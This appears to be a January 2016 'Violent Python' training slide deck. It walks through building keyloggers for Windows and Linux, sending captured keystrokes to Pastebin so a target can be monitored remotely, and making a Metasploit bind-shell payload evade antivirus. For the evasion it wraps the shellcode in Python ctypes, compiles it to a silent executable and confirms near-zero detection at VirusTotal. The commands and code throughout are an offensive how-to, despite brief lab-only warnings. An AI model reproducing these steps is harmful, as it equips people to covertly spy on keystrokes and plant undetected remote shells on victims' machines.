Keylogger with Python
Running the Keylogger Executable
Open notepad and type in your name again.
A file named YOURNAME-keylog.txt will appear
in the Dist folder
Double click the YOURNAME-keylog.txt file to
open it and what you typed should be visible in
this file
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Testing the Malware at VirusTotal
Browse to and click the Choose File button.
Select your file YOURNAME-keylog.exe and double click it.
Finally click the Scan It button.
You should see that your keylogger
executable is essentially undetectable.
Only one out of fifty anti-virus /
anti-malware products would catch it.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Linux Keylogger with Python
In this section you will learn how to make a Linux keylogger
with Python.
Prepare The Linux Environment
We need to install some software to prepare the environment
to write our keylogger.
Jan 2016
Install Python-Xlib. In a terminal windows execute this
command to download and install the python-xlib library:
apt-get install python-xlib
This is an X client library allowing Python to communicate
with the X-Windows environment
Copy PyXHook Execute this command to copy
into our current working directory:
cp violent_python/pyxhook/ .
The pyxhook package provides keyboard hooks in Linux
similar to pyhook for Windows.
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Writing the Keylogger in Python
In a terminal window execute this command to create and edit a new file:
While in the vi editor press i for insert mode and enter this code, as shown:
import pyxhook
def Keystroke(stroke):
if (stroke.Key == ‘Escape’):
Press ESC to exit insert mode and press :wq then Enter to save the file and quit
the editor.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Running the Keylogger
In a terminal window type in the following command:
This will run the keylogger in this terminal window which
will not return a prompt until the keylogger is stopped.
Open a new terminal window and type some text.
You wont see anything happen as we told our script to
send the keystroke to a file not print them to the screen.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Display the Logs
The keystrokes are being saved in the file keylogs.txt
Type the following to display the contents of this file:
cat keylogs.txt
You should see the keystrokes that have been captured.
Stopping the Keylogger
To stop the keylogger simply hit the ESC key.
This will terminate the keylogger and that terminal window
should return a prompt now.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Using Pastebin in Place of Local Log Files
While logging keystrokes to a local file is fine if you have physical access to the device in question we can fairly
easily change our program to log to an external site such as Pastebin.
At sign up for a free account and create a Developer API Key for the Pastebin API.
We can then use what we learned in the previous HTTP section about writing scripts that POST and combine it
with some research about the Pastebin API syntax to modify our keylogger.
With our keylogger performing HTTP POST requests to instead of
writing to a local log file we can now view the keystrokes from this target system from anywhere we wish.
Be careful if playing with this in your lab! Anything posted to Pastebin is in the wild with no easy undo.
So be mindful of what will be posted from your test device.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Some Useful Links Related To This Section
PyWin32 Project
PIP for Windows
PyInstaller – Turn Python Programs Into Stand Alone Executables
PyHook – Python Wrapper for Global Input Hooks in Windows
Python X Library
Simple Python Keylogger – This Includes the PyXHook Wrapper For Global Input Hooks in Linux X-Windows
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
In this section you will learn how to make malicious code evade detection by antivirus software.
Software like this can be used to commit real crimes. So: ONLY RUN THIS ON YOUR OWN TEST SYSTEMS
Antivirus Evasion with Python
We will modify malware with Python to evade detection as
malware by antivirus software.
This will demonstrate just how weak antivirus is.
The next few slides will demonstrate how we will do this using
both Linux and Windows machines.
While we will walk through the steps necessary on both
operating systems this will not be a hands on lab in the classroom.
Feel free to try this in your own lab outside of this class.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Generating Malicious Code with Metasploit
In order to modify malware we must first obtain some
malware. The easiest way to do this is to use a tool in our
Kali Linux environment called Metasploit
Metasploit can generate a lot of malicious code, but it's wellknown to antivirus companies and easily recognized in its
original form.
In Kali Linux, in a Terminal, execute this command:
msfpayload -l | more
You will see many pages of exploits
Lets use grep to narrow our search
msfpayload -l | grep windows | grep shell
You will see many ways to bind a shell on Windows
Binding a shell is the simplest form of remote control, listening
on a port and allowing anyone who connects to that port to
execute command lines.
This is obviously a very insecure thing, and any sensible
antivirus will stop it.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Generating Malicious Code with Metasploit
In Kali Linux, in a Terminal, execute this command:
msfpayload windows/shell_bind_tcp S
A summary of this exploit and its options appears
There are two required parameters: EXITFUNC and LPORT,
and they are both set to reasonable default values.
To generate this exploit execute the following commands:
msfpayload windows/shell_bind_tcp X > shell.exe
ls -l shell.exe
An executable is created named shell.exe
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Testing the Malware on a Windows Target
Move the "shell.exe" file to a Windows system and run it.
You can drag-and-drop it to another virtual machine, or email it,
or put it on a USB stick, etc.
When you do that, any antivirus you are using should catch it.
For example, here's what happened when I copied that file
If you are willing to turn off the antivirus and run this stuff,
here's what you will see.
I used Windows 2008 Server machine without any antivirus
software. I double-clicked "shell.exe" to run it, and a
Windows command line now shows it listening on port 4444
Task Manager shows the running "shell.exe" process.
I can now control my Windows machine with netcat from Linux
If you don't want to run the software, that's OK--the main point
of this project is not using it, but sneaking it past antivirus. If you
did run the malware, kill it in Task Manager, or restart your
Windows machine to stop it.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Testing the Malware at VirusTotal
Browse to and click
the Choose File button.
Select your file shell.exe and double click it.
Finally click the Scan It button.
You should see that your shell.exe file is
detected as malicious by many of the antivirus
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Creating Malware with Python
In Kali Linux, in a Terminal, execute this command:
msfpayload windows/shell_bind_tcp C
Exploit code written in C appears as shown.
What you see is raw binary machine code in the form of
hexadecimal character codes
To compile the code into a Windows executable, it needs to
be in a file. That's easy to do.
In Kali Linux, in a Terminal, execute these commands:
msfpayload windows/shell_bind_tcp C >
ls -l
The file has been generated
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Creating Malware with Python
This code is written in C, not in Python, so some additional lines
are needed.
In Kali Linux, in a Terminal, execute this command:
The code appears in the nano text editor, as shown here
Add this line to the top of the file:
from ctypes import *
That imports the library needed to run C programs in Python.
Remove all the comment lines.
Remove this line:
unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
shellcode = (
Your screen should now look as shown here
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Creating Malware with Python
In nano, use the down-arrow key to get to the end of the file.
Add a closing parenthesis before the semicolon at the end of the last line
Add these lines to the end of the file:
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
Your screen should now look like the one shown here
Save the file with Ctrl+X, Y, Enter.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Compiling the Python Code
At this point the exploit could be used on Windows machines with Python installed, but most Windows
machines don't have it.
To make it work on every Windows machine, it must be compiled into an EXE.
We'll use pyinstaller. While this compiler runs on Linux and Windows it is not a cross platform
compiler. So, if we want to compile a Windows executable we will need to do so on a Windows
Get a Windows Machine
We will need to prepare our Windows machine using the same steps we did in the keylogger section.
Here is a quick summary of what we need to do:
• Install Python.
• Install PyWin32.
• Install pip-Win.
• Install PyInstaller.
Moving the Malicious Source Code to Windows
Move the file from your Kali Linux machine to the desktop of your Windows machine. You
could drag and drop it, or highlight the contents and copy and paste them to a new Windows file.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Compiling the Windows Malware
Start pip-Win
In the Command field enter venv pyi-env-name
Click Run
Now you have a command shell window
In the Command Prompt window, execute this command:
pyinstaller --onefile --noconsole
This creates a folder named "dist" with the malware inside it,
in a file named "shell.exe".
Running the Malware
On your Windows desktop, double-click the dist folder.
Double-click the shell.exe file.
If a 'Windows Security Alert" box pops up, saying "Windows
Firewall has blocked some features of this program", click
"Allow Access".
In the Command Prompt, execute this command:
netstat -an | findstr 4444
You should see a listening port, as shown.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Jan 2016
Antivirus Evasion with Python
Testing the Windows Malware at VirusTotal
Browse to and click
the Choose File button.
Select your file shell.exe and double click it.
Finally click the Scan It button.
Your file should be much less detectable now.
When I did it, only 1/50 engines detected it, and
that was a Heuristic detection, meaning it just
seemed to act like a virus but could not be
specifically identified.
Violent Python presented by @alt_bier
Violent Python
Antivirus Evasion with Python
Some Useful Links Related To This Section
Metasploit MSFpayload
Creating Remote Shells that Bypass Anti-Virus with "Veil"
Python C TYPES
Netcat: The TCP/IP Swiss Army Knife
Jan 2016
Violent Python presented by @alt_bier